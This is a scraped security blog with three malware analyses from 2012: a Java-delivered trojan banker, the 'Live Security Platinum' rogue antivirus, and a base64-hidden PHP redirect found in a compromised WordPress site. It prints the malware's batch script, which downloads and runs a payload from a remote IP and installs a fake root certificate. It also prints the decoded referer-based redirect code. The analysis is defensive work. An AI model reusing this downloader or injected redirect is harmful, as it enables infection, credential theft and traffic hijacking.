Whatsapp is already announced that this is really hoax through their blog. <a href="http://blog.whatsapp.com/index.php/2012/01/it-is-a-hoax-really-it-is/">http://blog.whatsapp.com/index.php/2012/01/it-is-a-hoax-really-it-is/</a> .</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-80744795522921795502012-08-14T16:46:00.000+08:002012-08-14T19:58:50.244+08:00Trojan Banker/Password Stealer (B99A6FF84E4404488D789F5D56593735)<div class="separator" style="clear: both; text-align: justify;">
Yesterday, I just found one of local website has been compromised and embedded with malicious code. Once user visiting the website, by allowing the Java applet the malware will be downloaded and installed.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-ZsoQevhGiRm8K2duY1IXUfIF0JHzjIcOEu4dxVQpTmi45QzsE82PjrYCGWsvj_n0KwmgJibKwLPAclotafZ2GmyBQkGauP9sDUopnFgv19TZuERIb5QKF81Yumb4c9kh79Xt-iq5C_M/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="62" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-ZsoQevhGiRm8K2duY1IXUfIF0JHzjIcOEu4dxVQpTmi45QzsE82PjrYCGWsvj_n0KwmgJibKwLPAclotafZ2GmyBQkGauP9sDUopnFgv19TZuERIb5QKF81Yumb4c9kh79Xt-iq5C_M/s400/1.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
The picture above show you that you will be prompted to use Java plug-in to use some 'features' on this website. Lets take a look on the webpage source code. The red highlighted on the picture below is a Windows Batch command that will drop a VB Script file allowing it to download another malware (Windows executable) from Israel website. The website is also possibly has been compromised.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0w6iSldvRXTRRRxfkQdju-g5BLWMYGJtDMSb8AZ6yvzzMm5JVPD9A6KnBZb-Qn1k7yaeu8OMh1YIAVN628d41Jeu7QKq1yGX7N8ofLmzpkE24wr91-ayJEFsMRQD8wlRM4AhAn8_9Jjs/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0w6iSldvRXTRRRxfkQdju-g5BLWMYGJtDMSb8AZ6yvzzMm5JVPD9A6KnBZb-Qn1k7yaeu8OMh1YIAVN628d41Jeu7QKq1yGX7N8ofLmzpkE24wr91-ayJEFsMRQD8wlRM4AhAn8_9Jjs/s400/2.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
As we can see, the main page of the website has been embedded with extra code. At the top of it is calling the Java applet (Dantas.jar). This Java applet help to run the Windows Batch command. Below is the Java applet code.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2Pv1Q_jCM_HW3QxikWD2odS9sVhbfEyx1uMeViZFhAQZrKxqq8239UokFeDMyvm_yc6PkeihbRP99ZP1_m3XBtNgelSUuz1tgkIXHyEVUN8S0U7UArRiJZaf04NoLj7t_lTlSmf4KZww/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="317" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2Pv1Q_jCM_HW3QxikWD2odS9sVhbfEyx1uMeViZFhAQZrKxqq8239UokFeDMyvm_yc6PkeihbRP99ZP1_m3XBtNgelSUuz1tgkIXHyEVUN8S0U7UArRiJZaf04NoLj7t_lTlSmf4KZww/s400/4.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
If the Windows Batch Command successfully executed, it will save all the VBScript code into Windows temporary directory as a eden.vbs. Then, run the eden.vbs file to perform download and run the malware executable file.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3AZq0B2q60wE9DMGzt0JU19ZBDLYy8bYQ70RiTvu4n9332VcOQPXyBfTm3gPSbQZQkMZyR9rxeYOz6vAlWexrpQbz1aVLJit10C0PyLpFVqRw0qH53qY5TyikoNibeVFRppveoo9LwoI/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="126" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3AZq0B2q60wE9DMGzt0JU19ZBDLYy8bYQ70RiTvu4n9332VcOQPXyBfTm3gPSbQZQkMZyR9rxeYOz6vAlWexrpQbz1aVLJit10C0PyLpFVqRw0qH53qY5TyikoNibeVFRppveoo9LwoI/s400/3.png" width="400" /></a></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
At the bottom of the website also has been embedded with some scam pharma viagra hyperlink.</div>
<br />
<div class="separator" style="clear: both; text-align: justify;">
Now we need to take a look closer on the PE file downloaded from the following link:</div>
<div class="separator" style="clear: both; text-align: justify;">
hxxp://www.kanibar.co.il/tmp/DSC12012PDF.exe (a1d2a281980fdd75546557a9ba6de0a6)</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
The PE file is actually a SFX file. It is containing several file including certificate from the malware author.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKNWo10vJkUhF2_UMKrSlq5EAd1ouQqpR3glt5Bv9RpnQhJiu6zV8EP8WVX0UtGNZZxlznnSioCeUyzIYXW0SeWmbHdeRDHDvUrETKPXvNB5xgPNgqkRAjV6TpIGMnP38Zs6O1lWu3s9c/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKNWo10vJkUhF2_UMKrSlq5EAd1ouQqpR3glt5Bv9RpnQhJiu6zV8EP8WVX0UtGNZZxlznnSioCeUyzIYXW0SeWmbHdeRDHDvUrETKPXvNB5xgPNgqkRAjV6TpIGMnP38Zs6O1lWu3s9c/s400/5.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<table border="1px">
<tbody>
<tr>
<td><b>FileName</b></td>
<td><b>MD5</b></td>
<td><b>Desc.</b></td>
</tr>
<tr>
<td>certadm.dll</td>
<td>AED39116FE12C5550975043DA1D1B244</td>
<td>Microsoft Certificate Services Admin</td>
</tr>
<tr>
<td>certnew.cer</td>
<td>2B742FEB1883EE5CB418B1CBAB145A7D</td>
<td><b><span style="color: red;">Fake Security Certificate</span></b></td>
</tr>
<tr>
<td>certutil.exe</td>
<td>711DB2EF10B6C2AB2080698AEC6C6D08</td>
<td>Cert Util.exe</td>
</tr>
<tr>
<td>givetome.exe</td>
<td>6D2C398E03397C9D089EDC0F00AB3FCB</td>
<td>http://noeld.com/programs.asp</td>
</tr>
<tr>
<td>jeovahjireh.exe</td>
<td>0B2BF362548B244477D9FFB613AF54D4</td>
<td><span style="color: red;"><b>Malware</b></span></td>
</tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
The only file are suspicious is 'jeovahjireh.exe'. So we need to take a look closer on this. The file is compressed with UPX 3.07. The PE file is actually some kind of Bat2Exe file binder. Inside the PE file contain Windows Batch Command.</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<pre class="brush:php">@shift
@break off
echo 274087083240932840982409820482048282830482429384234932408270983238 > %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
set inf=0
set exe="%temp%\msavc.exe"
if exist %temp%\%USERNAME%.dll goto mapa
> %temp%\%USERNAME%.dll echo y
:mapa
%temp%\givetome.exe http://216.17.106.2/~comprapr/KLJAWEIUIJN92838921JAS.JIP "%exe%"
del "%temp%\leiame.txt"
ECHO -------------------------------------------------------------------------------
%tmp%\certutil.exe -addstore root %tmp%\certnew.cer
certutil -addstore root %tmp%\certnew.cer
cmd.exe /c "%exe%"
del /F %tmp%\certnew.cer
del /F %tmp%\certadm.dll
del /F %tmp%\certutil.exe
del /F %tmp%\givetome.exe
echo fhsdkjhfkjdsfkjdsfhdskhfjkhjkhdsjkhfkjsdhfkjsdhfkjdsfds > %temp%\xhuahushbnnmf.dat.dat
echo j943793874324693284632764932843 jfdsjfhkhjdshfjkdhsf>> %temp%\xhuahushbnnmf.dat.dat
. . .
echo jfdeidhpjrher093u40ruhdfuhisufsd90fu43u90urifhdsjfsiofkjsofsdjfsdfdjhfsd >> %temp%\xhuahushbnnmf.dat.dat
echo j943793874324693284632764932843 jfdsjfhkhjdshfjkdhsf>> %temp%\xhuahushbnnmf.dat.dat
echo adgfsvgf354bvt2435tvb234rtg234vtrvc5234tvc254 >> %temp%\xhuahushbnnmf.dat.dat</pre>
<br />
<div class="separator" style="clear: both; text-align: justify;">
The code is a bit lengthy and some kind of semi obfuscated. Most of the code are useless. I just cut off some of the junk code.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
What the Windows Batch Command do is actually download another PE file from the following URL:</div>
<div class="separator" style="clear: both; text-align: justify;">
hxxp://216.17.106.2/~comprapr/KLJAWEIUIJN92838921JAS.JIP</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
The *.jip file will be named as 'msavc.exe' and saved in temp directory. After that it will add the 'certnew.cer' certificate onto the infected machine as a root.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTdKLwIs_K6Q9RKWC7fYObxOaCQSxCcEDiEib_7xmIwtknn_AcXaJINbz5fW5JGRrb0qrZlHJG6L3yGcppM62wGsb2l-48X-GsgCyGNyWu_Gp5jG0byTKjOrAs2eXP5uFTChdli6MZ85M/s1600/cert12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTdKLwIs_K6Q9RKWC7fYObxOaCQSxCcEDiEib_7xmIwtknn_AcXaJINbz5fW5JGRrb0qrZlHJG6L3yGcppM62wGsb2l-48X-GsgCyGNyWu_Gp5jG0byTKjOrAs2eXP5uFTChdli6MZ85M/s400/cert12.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Then, it execute the 'msavc.exe' using cmd.exe. All bundled file will be delete then (certnew.cer, certadm.dll, certutil.exe, givetome.exe).</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Now we need to take a look on the new downloaded PE file (B99A6FF84E4404488D789F5D56593735) named as 'msavc.exe'. This file has been packed with UPX 3.08 and written with Borland Delphi.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Based on VirusTotal result the PE file is possibly a trojan stealer, password stealer or trojan banker. Which is stealing user information on victim PCs.</div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://www.virustotal.com/file/7802350f5052b8e5d8e13eda728ee28586b94b09fca05bd8f0e3abe0b6e49b1f/analysis/1344927303/">https://www.virustotal.com/file/7802350f5052b8e5d8e13eda728ee28586b94b09fca05bd8f0e3abe0b6e49b1f/analysis/1344927303/</a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFp_yaBgQydekty1oEPom1f7jG76h4relBhDYklSY5zDS_U_VFNIUXDSw0v3Tr7TpLOw_imvqCRRwPAciMvZncP8wQJDZyb9cGvcmnN7vRbKZlhV-9hBJUN9ioIXgeveP3ziIj1l9BIOA/s1600/cap1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFp_yaBgQydekty1oEPom1f7jG76h4relBhDYklSY5zDS_U_VFNIUXDSw0v3Tr7TpLOw_imvqCRRwPAciMvZncP8wQJDZyb9cGvcmnN7vRbKZlhV-9hBJUN9ioIXgeveP3ziIj1l9BIOA/s400/cap1.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
As we can see on the network traffic it will try to access to the following URL followed with parameter content:</div>
hxxp://www.snv1r1.net/2k12v3r1/71164BED09340ABE6D4C69BD.php?op=7A0B4EED571641ED7E277EBE704E09DA3C5D3E<br />
<div>
<br /></div>
<div>
The domain name is still active but the content of the given URL is not available anymore.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijnHJusTDF02Y5C8l4zC5rhsEq5AJnG7FIdp2NtXL74hCSPa5BDMAwTzB1wq76MEpzLH3gQHlA66jyPBVqE-VtO5Z6HNRVFsiJWNtemRLO_bac9EVmMu5kq3PRllIvoFmEsmX4SB_GrMA/s1600/mutex1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijnHJusTDF02Y5C8l4zC5rhsEq5AJnG7FIdp2NtXL74hCSPa5BDMAwTzB1wq76MEpzLH3gQHlA66jyPBVqE-VtO5Z6HNRVFsiJWNtemRLO_bac9EVmMu5kq3PRllIvoFmEsmX4SB_GrMA/s400/mutex1.png" width="400" /></a></div>
<div>
<br /></div>
<div>
Several mutex also created by this malware. The malware also crawling into several sensitive directory.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_Gjbfh1toiRhy0XuJ7ikKif_fk81Evp5nvx4QR7F5BH9SuAUG-KI7-HjFZS1QMrj3NMH7DfwCoG7ZRgCYF_s-wcOLzR34YDM52N7xSdY8RNuKqjzGuh0oHnHlVRh2BPcKP18RB1XxKes/s1600/crawl1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_Gjbfh1toiRhy0XuJ7ikKif_fk81Evp5nvx4QR7F5BH9SuAUG-KI7-HjFZS1QMrj3NMH7DfwCoG7ZRgCYF_s-wcOLzR34YDM52N7xSdY8RNuKqjzGuh0oHnHlVRh2BPcKP18RB1XxKes/s400/crawl1.png" width="400" /></a></div>
<div>
<br /></div>
<div>
It also make changes on a lot of places on Windows registry to lower the security setting and get internet settings information.<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Online Sandbox Result:<br />
1. <a href="https://www.virustotal.com/file/d15d650d4bf08626af7a4e5322c967fb0e3ca23805d9da6904f5f8ee88f0c55b/analysis/">https://www.virustotal.com/file/d15d650d4bf08626af7a4e5322c967fb0e3ca23805d9da6904f5f8ee88f0c55b/analysis/</a><br />
2. <a href="http://malwr.com/analysis/a1d2a281980fdd75546557a9ba6de0a6/">http://malwr.com/analysis/a1d2a281980fdd75546557a9ba6de0a6/</a></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-65025268165307466112012-08-13T20:33:00.002+08:002012-08-13T23:06:00.120+08:00Live Security Platinum (RougeAV)<div style="text-align: justify;">
Just couple of weeks ago I just receive a rouge av sample the disguise as 'Live Security Platinum'. Although this malware is already discovered by other people few months ago. Once this malware is installed all your executable file will be mark as 'infected'. None of your file can be executed until you purchase their 'security' antivirus program. Lets take a look a basic dynamic analysis here. In this write up I'm not covering in detail about removing it from your system.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The malware that I received is from a compromised website that has been embedded with java object file that require users to allow their browser to execute the .jar file. This .jar file will the download the .exe install of the 'Live Security Platinum' malware.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdvfANkXTYbPs_nqyvX5JfblDbvWeIwKF6WvOJgNEgKMN4ZY496AQYWt7UClQILdCkVSFc88GS3vGKXOo5XQfe3jyM6EwwJRMp5xB4SacjZox9TclccRd0SmCv-UNdrxCBj6BJS2E__ks/s1600/lsp2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdvfANkXTYbPs_nqyvX5JfblDbvWeIwKF6WvOJgNEgKMN4ZY496AQYWt7UClQILdCkVSFc88GS3vGKXOo5XQfe3jyM6EwwJRMp5xB4SacjZox9TclccRd0SmCv-UNdrxCBj6BJS2E__ks/s400/lsp2.png" width="400" /></a></div>
<br />
<div style="text-align: justify;">
The snapshot above show the first run of the malware which is check the latest update, download an install. The installed path will be located on user program data. See the image below.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWIa85BiDrGM3mHY1ortBql20DH9qh8om2TU0kmfbYLPaEv-eSGLjiivQGL6jZoo_lKwSAAJIjeYPQJhNo2Ksc66JK2QHnZmE19HEKdcf8l6_u0ZhLX0B8xcEfA75hyphenhyphen1ABajM8F6BVFpU/s1600/lsp11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="130" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWIa85BiDrGM3mHY1ortBql20DH9qh8om2TU0kmfbYLPaEv-eSGLjiivQGL6jZoo_lKwSAAJIjeYPQJhNo2Ksc66JK2QHnZmE19HEKdcf8l6_u0ZhLX0B8xcEfA75hyphenhyphen1ABajM8F6BVFpU/s400/lsp11.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxtTw7DRmg0Kb4swhVX_fIAF3cHC0slql4Pd_v-y5pV2YfP36bosz53TmIAyBbt9s1DeV5Cmhxaq9bMaJrIW1ggA5tc9kuaSJt_uTY8bEEovMKrG5Yv8OXB_w7xu2etj28ANJ3o9phRpU/s1600/lsp3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxtTw7DRmg0Kb4swhVX_fIAF3cHC0slql4Pd_v-y5pV2YfP36bosz53TmIAyBbt9s1DeV5Cmhxaq9bMaJrIW1ggA5tc9kuaSJt_uTY8bEEovMKrG5Yv8OXB_w7xu2etj28ANJ3o9phRpU/s400/lsp3.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
After finished install it will automatically doing a fake 'scan'. At this time, all your application cannot be execute and has been blocked by the malware.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6e7YwfHxnqnPtGwXRZwuG6i1kBF_PDqPZ4hOdD2zXgkFuBGLKJf4Rwv5wTs2BThnD7kzwoNwT6_8ef4NSbKByJ_j8Qoe8ZKQnMTjxrRIonijbvG7d3LgHseLHugM2yRo4BEZrMv9HrS4/s1600/lsp4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6e7YwfHxnqnPtGwXRZwuG6i1kBF_PDqPZ4hOdD2zXgkFuBGLKJf4Rwv5wTs2BThnD7kzwoNwT6_8ef4NSbKByJ_j8Qoe8ZKQnMTjxrRIonijbvG7d3LgHseLHugM2yRo4BEZrMv9HrS4/s400/lsp4.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
If you try to run any application on your computer, you will get fake notification that say your computer has been infected by 'malware'.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxWWRWdQEYqWUUaQwQWhl_5QahImwhw9dWVaURrMwq1GMAzGayb67bplXAiFZS-hnh8sb-8K352Xe0jCaAE-kUG3BWD2_3NXPmzgi0hCbwtky_t-jRL73F-tGMA76eILKdc8g8QqHiSJk/s1600/lsp5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxWWRWdQEYqWUUaQwQWhl_5QahImwhw9dWVaURrMwq1GMAzGayb67bplXAiFZS-hnh8sb-8K352Xe0jCaAE-kUG3BWD2_3NXPmzgi0hCbwtky_t-jRL73F-tGMA76eILKdc8g8QqHiSJk/s400/lsp5.png" width="400" /></a></div>
<br />
It will keep remind you to update and purchase their 'software'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOEGSG-lfi5IBlYXtfr4ltPy3rFYJmzNm_cHz5y15Q9kbhonrHbJSViwPx_BPNhe-SH8VGqOzw89LzKtb0UmIhxSlAs2vq0XKdnlPW4BhGSKyreYblGnyQieqfAR0mKdg_4WSzjP51gpQ/s1600/lsp6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOEGSG-lfi5IBlYXtfr4ltPy3rFYJmzNm_cHz5y15Q9kbhonrHbJSViwPx_BPNhe-SH8VGqOzw89LzKtb0UmIhxSlAs2vq0XKdnlPW4BhGSKyreYblGnyQieqfAR0mKdg_4WSzjP51gpQ/s400/lsp6.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Lets give a try by entering a valid serial number to this malware registration form. The key that I was entered is AA39754E-715219CE. This key is already circulated on the internet. So, I just use it for easy removing the infection.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqaX5vuBwehq6vP-AE7G4xBvH7o915djoo7ENt64d9RtCURSgCnJhCiEJiEiaHt62iBydQZd-GTPa0ynPZ1qU8gwQozmTXgEjP3_JJS46hDFK7cZOs-oc_aIv9upn102J8M3zQ7JC1zv0/s1600/lsp7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqaX5vuBwehq6vP-AE7G4xBvH7o915djoo7ENt64d9RtCURSgCnJhCiEJiEiaHt62iBydQZd-GTPa0ynPZ1qU8gwQozmTXgEjP3_JJS46hDFK7cZOs-oc_aIv9upn102J8M3zQ7JC1zv0/s400/lsp7.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Once you click on 'Activate' button you will prompt about your successful register their 'product'. All your application now can be able to run normally. Now you will notice that the rouge AV window has been change to light blue color and there an extra shortcut icon on your desktop. It is a shortcut URL to access to the malware website.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQPJD3Hm6ioTniEByvxWVKWSwMRKUnP6qUs6wPJ5zlL1IW3jK7H8bXWJvL-nQlZmUR4knwY528BoGHwHn0xJ1gOMBPbkqTtAP9MyQPHwMpPTQ6y_7_ISM-a-RM-rK5aN9pvqbWAnBjDi4/s1600/lsp9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQPJD3Hm6ioTniEByvxWVKWSwMRKUnP6qUs6wPJ5zlL1IW3jK7H8bXWJvL-nQlZmUR4knwY528BoGHwHn0xJ1gOMBPbkqTtAP9MyQPHwMpPTQ6y_7_ISM-a-RM-rK5aN9pvqbWAnBjDi4/s400/lsp9.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
If we try to open up the URL you will see there is online user guide for user to read. Until now the website is still accessible to the user.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZfjApMg6vUG-gOcBb2jMLTV9Kkt_lcE7kMSFYIcHlJpiAc4SFmjX8k7gZGkS3uiLESXEyZbtIM39yzPNQNvS5-eO6-x99cKxYqwwMqO0Tjxgy8H-eg-6nl0A4LDic94MlIm9oadBGR5g/s1600/lsp10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZfjApMg6vUG-gOcBb2jMLTV9Kkt_lcE7kMSFYIcHlJpiAc4SFmjX8k7gZGkS3uiLESXEyZbtIM39yzPNQNvS5-eO6-x99cKxYqwwMqO0Tjxgy8H-eg-6nl0A4LDic94MlIm9oadBGR5g/s400/lsp10.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
For removal, MalwareBytes Anti-Malware would be fine to clean all the infection.</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-61836800501966327342012-05-26T01:51:00.000+08:002012-08-09T11:13:15.509+08:00Parasite PHP script on victim website (minkof.sellclassics.com)While helping victim website removing phishing site and doing patching I just found interesting malicious code inside the Wordpress based website. The case begin when the victim site hosted a phishing site. The phishing web founded on several directory which is disguised as CIMB Bank. While updating with new Wordpress version and all the plugins I just notice there is something wrong with the size of index.php files. I also installed the SIG (Silent Is Golden) plugins to hide all the directory traversal. It will install an empty index.php file.<br />
<br />
After finishing all the basic patches, I just notice the 'empty' index.php file is not empty. Open up the index.php file and found this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf7MzBoJOp7SWDLtigCfteK9lDVIa7ZGQK8ZIHnn1i32tSzBEkwYYUkofH6DkLcWOAbVCKmxt0AttPKPl8InnmpR7ZJVHlv3rfnevVhwTBCUMRUVdYtV0eqoEPl8HVxi02pnU1OBjBdKs/s1600/php1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf7MzBoJOp7SWDLtigCfteK9lDVIa7ZGQK8ZIHnn1i32tSzBEkwYYUkofH6DkLcWOAbVCKmxt0AttPKPl8InnmpR7ZJVHlv3rfnevVhwTBCUMRUVdYtV0eqoEPl8HVxi02pnU1OBjBdKs/s400/php1.png" width="400" /></a></div>
<br />
This is definitely not good. Lets decode the base64 encoded eval() part and see what we got.<br />
<pre class="php">error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://minkof.sellclassics.com/");
exit();
}}}}}</pre>
<br />
